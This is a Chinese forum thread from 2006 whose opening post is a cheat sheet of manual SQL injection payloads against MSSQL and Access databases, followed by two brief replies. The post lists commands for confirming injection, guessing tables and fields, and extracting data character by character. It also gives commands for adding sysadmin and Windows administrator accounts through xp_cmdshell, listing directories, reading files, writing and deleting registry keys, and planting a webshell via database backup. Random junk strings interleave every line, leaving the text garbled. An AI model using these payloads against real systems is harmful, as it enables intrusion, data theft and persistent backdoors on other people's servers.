社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4860阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 5 ,B_u%bb  
  2.初步判断是否是mssql ;and user>0 SBk4_J/_  
!6O(-S2A  
  3.注入参数是字符'and [查询条件] and ''=' ep)n_!$OH"  
2,b(,3{`4:  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' U- (01-  
;~ $'2f~U  
  5.判断数据库系统 J7Hl\Q[D1  
~#[yJNYQ  
  ;and (select count(*) from sysobjects)>0 mssql SaAFz&WRl  
;LPfXpR  
  ;and (select count(*) from msysobjects)>0 access b)5uf'?-  
oC: {aK6\  
S8wLmd>  
5o'FS{6U  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 iDz++VNV  
(!7sE9rP  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Ls$D$/:q?  
}1c|gQ  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 #64-~NVL_  
p6]1w]*R  
  9.(1)猜字段的ascii值(access) u=?.}Pj  
5z8d} I  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 z2_*%S@  
=_ ./~  
  (2)猜字段的ascii值(mssql) 2Aazy'/  
v6M6>&RR|  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 F^t DL:  
b_#m}yZ6  
  10.测试权限结构(mssql) p;59?  
oim9<_  
+\c5]`  
F|o:W75  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 3G)#5 Lf<  
Yz/md1T$  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- RXpw!  
\K{0L  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- tqvN0vY5  
0d"[l@UU0  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- u~M q*  
mPtZO*Fc  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Q_Q''j(r6b  
hk(ZM#Bh  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- hl7bzKO*w  
pMx*F@&nU  
  ;and 1=(select IS_MEMBER('db_owner'));-- (cAIvgI  
HZzDVCU  
[LjT*bi  
+j`5F3@  
  11.添加mssql和系统的帐户 av}k)ZT_  
]YnD  
  ;exec master.dbo.sp_addlogin username;-- =)H.c uc  
  ;exec master.dbo.sp_password null,username,password;-- \}u Y'F  
c)TPM/>(p  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- LEbB(x;@  
N ,'GN[s  
  ;exec master.dbo.xp_cmdshell 'net user username password @w#-aGJO  
n/;WxnnQ  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Cx(>RXVoJ,  
$Uq|w[LA  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- (Ft+uuG  
Ga-k  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- IXMop7~  
jH5 k  
?K$(817  
#l\=}#\1Wb  
  12.(1)遍历目录 U2tV4_ e  
1y4|{7bb  
  ;create table dirs(paths varchar(100), id int) }>pknc?  
3 Gp$a;g  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' r_)' Ps  
`quw9j9`C\  
  ;and (select top 1 paths from dirs)>0 fa jGZyd0:  
{k>&?Vd!  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Z, zWuE3  
:[p}  
e8>})  
lLX4Gq1  
  (2)遍历目录 O@T9x$  
GvtG(u~  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- O%WIf__Q  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 LiC*@W  
!fV+z%:  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 7X`g,b!  
c?(4t67|  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 g+8OekzB5  
-P(efYk  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 SXSgld2uS  
h"[AOfTE$  
j2t7'bO_  
px A?  
  13.mssql中的存储过程 DTX0  
>2y':fO  
  xp_regenumvalues 注册表根键, 子键 Hck]aKI+  
pQyK={7?`  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 e[{0)y>=  
S*,17+6dV  
  xp_regread 根键,子键,键值名 paA(C|%{  
KaLzg5is  
  ;exec xp_regread HDz5&7* .  
j"8ZM{aO  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 $f$SNx)),  
$!-yr7  
  xp_regwrite 根键,子键, 值名, 值类型, 值 %e8@*~h@  
$H2u.U<ip  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 juP7P[d$qW  
i7CX65&b  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 7zl5yK N  
pN, u`[  
  xp_regdeletevalue 根键,子键,值名 s-NX o  
k`cfG\;r  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 H-!,yte  
cRC6 s8  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 &Gc9VF]o  
vJLK,[  
CmWeY$Jb  
]]HNd7Vh  
  14.mssql的backup创建webshell ]E{NNHK%2N  
c rQ8q;:  
  use model ,Y@Gyx!4  
%6t:(z  
  create table cmd(str image); DVO.FTV^`  
;'gWu  
  insert into cmd(str) values (''); \Zb;'eDv  
mwO6g~@ `  
  backup database model to disk='c:\l.asp'; qRu~$K  
3h]g}&k  
zWnX*2>b  
M.JA.I@XC  
  15.mssql内置函数 wC"FDr+  
W PC]%:L"  
  ;and (select @@version)>0 获得Windows的版本号 HGl|-nW>  
!OZy7  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa a1+oj7  
v<k?Vu  
  ;and (select user_name())>0 爆当前系统的连接用户 (xycJ`N  
^ G]J,+  
  ;and (select db_name())>0 得到当前连接的数据库 z,RhYm  
REQ\>UO_  
9p85Pv [M=  
2 'l'8  
  16.简洁的webshell =&6eM2>P  
p;a,#IJu  
  use model *9 {PEx  
7lTC{7C57  
  create table cmd(str image); xl{=Y< ;  
EZgwF =lO  
  insert into cmd(str) values (''); 'I|v[G$l  
_r#Z}HK  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八